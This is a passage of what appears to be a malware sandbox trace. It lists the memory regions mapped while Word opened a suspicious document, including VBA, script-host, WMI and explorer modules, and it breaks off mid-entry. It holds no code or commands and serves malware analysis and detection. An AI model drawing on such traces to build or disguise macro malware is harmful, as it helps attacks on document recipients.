"\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.doc") Region: id = 509 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 510 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.doc") Region: id = 511 start_va = 0x6aff0000 end_va = 0x6b021fff monitored = 0 entry_point = 0x6b00c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 512 start_va = 0x6afd0000 end_va = 0x6afeffff monitored = 0 entry_point = 0x6afdc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 513 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 514 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.doc") Region: id = 515 start_va = 0x6aff0000 end_va = 0x6b02efff monitored = 0 entry_point = 0x6b014c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 516 start_va = 0x6afd0000 end_va = 0x6afeffff monitored = 0 entry_point = 0x6afdc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 517 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 518 start_va = 0x2570000 end_va = 0x2578fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.doc") Region: id = 519 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 520 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.doc") Region: id = 521 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 522 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 523 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{8d0a00ed-49f2-4c7f-b155-f09709c71763}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{8D0A00ED-49F2-4C7F-B155-F09709C71763}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{8d0a00ed-49f2-4c7f-b155-f09709c71763}.tmp") Region: id = 524 start_va = 0x65fb0000 end_va = 0x6622efff monitored = 1 entry_point = 0x6604bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 525 start_va = 0x6af70000 end_va = 0x6b02efff monitored = 0 entry_point = 0x6af81dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\SystemX86\\msvcr100.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\systemx86\\msvcr100.dll") Region: id = 526 start_va = 0xcea0000 end_va = 0xd01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cea0000" filename = "" Region: id = 527 start_va = 0x2570000 end_va = 0x2573fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 528 start_va = 0x8570000 end_va = 0x85b4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 529 start_va = 0x2580000 end_va = 0x2583fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 530 start_va = 0xa1b0000 end_va = 0xa23dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 531 start_va = 0xffa0000 end_va = 0x1039afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ffa0000" filename = "" Region: id = 532 start_va = 0x2590000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 533 start_va = 0x25a0000 end_va = 0x25a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 534 start_va = 0x2890000 end_va = 0x2890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 535 start_va = 0xcea0000 end_va = 0xcf7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "arial.ttf" filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf") Region: id = 536 start_va = 0xd010000 end_va = 0xd01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d010000" filename = "" Region: id = 537 start_va = 0x65e90000 end_va = 0x65fabfff monitored = 0 entry_point = 0x65ef74f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 538 start_va = 0x2890000 end_va = 0x2890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002890000" filename = "" Region: id = 539 start_va = 0xa240000 end_va = 0xa2e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a240000" filename = "" Region: id = 540 start_va = 0x103a0000 end_va = 0x1059ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000103a0000" filename = "" Region: id = 541 start_va = 0xd020000 end_va = 0xd11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d020000" filename = "" Region: id = 542 start_va = 0x105a0000 end_va = 0x1095cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000105a0000" filename = "" Region: id = 543 start_va = 0x10960000 end_va = 0x10d1cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010960000" filename = "" Region: id = 544 start_va = 0x85c0000 end_va = 0x85cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 545 start_va = 0x85d0000 end_va = 0x85dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 546 start_va = 0x85e0000 end_va = 0x85effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085e0000" filename = "" Region: id = 547 start_va = 0x85e0000 end_va = 0x85effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085e0000" filename = "" Region: id = 548 start_va = 0x10d20000 end_va = 0x10dbafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d20000" filename = "" Region: id = 549 start_va = 0x85e0000 end_va = 0x85effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085e0000" filename = "" Region: id = 550 start_va = 0xb670000 end_va = 0xb67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b670000" filename = "" Region: id = 551 start_va = 0xcf80000 end_va = 0xcf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf80000" filename = "" Region: id = 552 start_va = 0xcf80000 end_va = 0xcf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf80000" filename = "" Region: id = 553 start_va = 0xcf90000 end_va = 0xcf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 554 start_va = 0xcfa0000 end_va = 0xcfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfa0000" filename = "" Region: id = 555 start_va = 0xcf80000 end_va = 0xcf80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf80000" filename = "" Region: id = 556 start_va = 0x6af60000 end_va = 0x6af6afff monitored = 0 entry_point = 0x6af62150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 557 start_va = 0x65dc0000 end_va = 0x65e88fff monitored = 0 entry_point = 0x65dd3180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 558 start_va = 0x65da0000 end_va = 0x65dbbfff monitored = 0 entry_point = 0x65da4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 559 start_va = 0x6af50000 end_va = 0x6af5efff monitored = 0 entry_point = 0x6af53f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 560 start_va = 0xcf90000 end_va = 0xcf90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf90000" filename = "" Region: id = 561 start_va = 0x10dc0000 end_va = 0x10ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 562 start_va = 0x10dc0000 end_va = 0x10ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 563 start_va = 0x10dc0000 end_va = 0x10ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 564 start_va = 0xcf90000 end_va = 0xcf90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf90000" filename = "" Region: id = 565 start_va = 0x10dc0000 end_va = 0x10ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 566 start_va = 0x10dc0000 end_va = 0x10ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 567 start_va = 0xcf90000 end_va = 0xcf96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 568 start_va = 0x6b130000 end_va = 0x6b13cfff monitored = 0 entry_point = 0x6b133520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 569 start_va = 0x6b0c0000 end_va = 0x6b126fff monitored = 0 entry_point = 0x6b0db610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 570 start_va = 0x6b0a0000 end_va = 0x6b0b0fff monitored = 0 entry_point = 0x6b0a8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 571 start_va = 0x65070000 end_va = 0x6512efff monitored = 0 entry_point = 0x650a1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 572 start_va = 0x6ce70000 end_va = 0x6ceb0fff monitored = 0 entry_point = 0x6ce77fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 573 start_va = 0xcfa0000 end_va = 0xcfaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cfa0000" filename = "" Region: id = 574 start_va = 0x64fe0000 end_va = 0x65060fff monitored = 0 entry_point = 0x64ffb260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 575 start_va = 0x10dc0000 end_va = 0x10ea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msword.olb") Region: id = 576 start_va = 0x10eb0000 end_va = 0x110d6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 577 start_va = 0x64da0000 end_va = 0x64fd0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 578 start_va = 0xcfa0000 end_va = 0xcfa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cfa0000" filename = "" Region: id = 579 start_va = 0x74240000 end_va = 0x74281fff monitored = 0 entry_point = 0x74256f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 580 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 581 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 582 start_va = 0xcfb0000 end_va = 0xcfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfb0000" filename = "" Region: id = 583 start_va = 0xcfc0000 end_va = 0xcfe5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 584 start_va = 0xcff0000 end_va = 0xcffafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 585 start_va = 0xd000000 end_va = 0xd00ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d000000" filename = "" Region: id = 586 start_va = 0xd000000 end_va = 0xd000fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d000000" filename = "" Region: id = 587 start_va = 0xd120000 end_va = 0xd13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d120000" filename = "" Region: id = 588 start_va = 0xd140000 end_va = 0xd142fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d140000" filename = "" Region: id = 589 start_va = 0xd150000 end_va = 0xd153fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 590 start_va = 0xd160000 end_va = 0xd160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 591 start_va = 0xd170000 end_va = 0xd170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d170000" filename = "" Region: id = 592 start_va = 0x10eb0000 end_va = 0x10eb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010eb0000" filename = "" Region: id = 593 start_va = 0x10ec0000 end_va = 0x10edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ec0000" filename = "" Region: id = 594 start_va = 0x10ee0000 end_va = 0x10ee2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ee0000" filename = "" Region: id = 595 start_va = 0x10ef0000 end_va = 0x10f04fff monitored = 1 entry_point = 0x10f8bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 596 start_va = 0x10f10000 end_va = 0x10f14fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 597 start_va = 0x10f20000 end_va = 0x10f30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 598 start_va = 0x10f40000 end_va = 0x10fbbfff monitored = 0 entry_point = 0x10f41000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 599 start_va = 0x10fc0000 end_va = 0x10fccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 600 start_va = 0x10fd0000 end_va = 0x10fd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010fd0000" filename = "" Region: id = 601 start_va = 0x10fe0000 end_va = 0x10fe3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010fe0000" filename = "" Region: id = 602 start_va = 0x10ff0000 end_va = 0x10ff3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ff0000" filename = "" Region: id = 603 start_va = 0x11000000 end_va = 0x1101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011000000" filename = "" Region: id = 604 start_va = 0x11020000 end_va = 0x11022fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011020000" filename = "" Region: id = 605 start_va = 0x11030000 end_va = 0x11035fff monitored = 1 entry_point = 0x110cbfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 606 start_va = 0x11040000 end_va = 0x1107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011040000" filename = "" Region: id = 607 start_va = 0x11080000 end_va = 0x1117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011080000" filename = "" Region: id = 608 start_va = 0x11180000 end_va = 0x11183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 609 start_va = 0x11190000 end_va = 0x11193fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011190000" filename = "" Region: id = 610 start_va = 0x111a0000 end_va = 0x111affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111a0000" filename = "" Region: id = 611 start_va = 0x111b0000 end_va = 0x111bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 612 start_va = 0x111c0000 end_va = 0x111cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111c0000" filename = "" Region: id = 613 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 614 start_va = 0x111c0000 end_va = 0x1125efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111c0000" filename = "" Region: id = 615 start_va = 0x11260000 end_va = 0x11263fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mlang.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mlang.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mlang.dll.mui") Region: id = 616 start_va = 0x11270000 end_va = 0x11270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011270000" filename = "" Region: id = 617 start_va = 0x11270000 end_va = 0x11370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011270000" filename = "" Region: id = 618 start_va = 0x11270000 end_va = 0x11370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011270000" filename = "" Region: id = 619 start_va = 0x11270000 end_va = 0x11370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011270000" filename = "" Region: id = 620 start_va = 0x11270000 end_va = 0x1166ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011270000" filename = "" Region: id = 621 start_va = 0x11670000 end_va = 0x116effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011670000" filename = "" Region: id = 622 start_va = 0x76c00000 end_va = 0x76c04fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 623 start_va = 0x11270000 end_va = 0x11273fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 624 start_va = 0x11280000 end_va = 0x11291fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 625 start_va = 0x112a0000 end_va = 0x112a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000112a0000" filename = "" Region: id = 626 start_va = 0x112a0000 end_va = 0x113a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 627 start_va = 0x112a0000 end_va = 0x113a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 628 start_va = 0x112a0000 end_va = 0x113a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 629 start_va = 0x112a0000 end_va = 0x112a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000112a0000" filename = "" Region: id = 630 start_va = 0x112a0000 end_va = 0x113a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 631 start_va = 0x112a0000 end_va = 0x113a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 632 start_va = 0x6b070000 end_va = 0x6b092fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 633 start_va = 0x6b050000 end_va = 0x6b065fff monitored = 0 entry_point = 0x6b0521d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 634 start_va = 0x64d70000 end_va = 0x64d9afff monitored = 0 entry_point = 0x64d79a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 635 start_va = 0x112a0000 end_va = 0x112b4fff monitored = 0 entry_point = 0x112a9a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 636 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 637 start_va = 0x7fe00000 end_va = 0x7fe7dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 651 start_va = 0x112c0000 end_va = 0x1170bfff monitored = 0 entry_point = 0x1135e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 652 start_va = 0x649d0000 end_va = 0x64d60fff monitored = 0 entry_point = 0x64c835b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 653 start_va = 0x112a0000 end_va = 0x1169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 654 start_va = 0x116a0000 end_va = 0x116affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116a0000" filename = "" Region: id = 655 start_va = 0x116b0000 end_va = 0x116bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116b0000" filename = "" Region: id = 656 start_va = 0x116c0000 end_va = 0x116cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116c0000" filename = "" Region: id = 657 start_va = 0x116c0000 end_va = 0x116cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116c0000" filename = "" Region: id = 658 start_va = 0x116d0000 end_va = 0x116dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116d0000" filename = "" Region: id = 659 start_va = 